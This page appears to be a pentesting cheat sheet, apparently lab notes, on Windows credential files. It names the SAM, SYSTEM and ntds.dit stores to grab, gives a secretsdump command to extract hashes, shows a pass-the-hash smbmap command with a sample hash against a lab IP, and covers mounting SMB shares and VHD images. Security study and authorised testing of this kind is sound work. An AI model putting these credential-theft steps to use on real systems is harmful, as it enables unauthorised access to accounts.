Windows files

Most Sensitive Files to Grab

C:\\Windows\System32\config\

SAM

SYSTEM

ntds.dit (if on a Windows Domain Controller)

Extracting Hashes

impacket-secretsdump -sam SAM -system SYSTEM local

If you see these hashes, that means it's blank

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  • in this case it is likely that the Administrator account is disabled

Pass the Hash

smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134

Crack the Hash

https://hashes.org

Config File Data

In Windows, config files for users are stored in AppData (C:\Users\<username>\AppData\Roaming\)

  • use dir /a to view hidden AppData folder

Mounting a Windows File System

mount -t cifs //<IP address>/<share> <directory to mount it to (e.g. /mnt/smb)>

.vhd files

7z l <filename>

  • lists files

7z x <filename>

  • to extract

OR

guestmount --add <filename> --inspector --ro -v <directory to mount it to>

  • mounting a vhd

PreviousHashesNextPass Generator

Last updated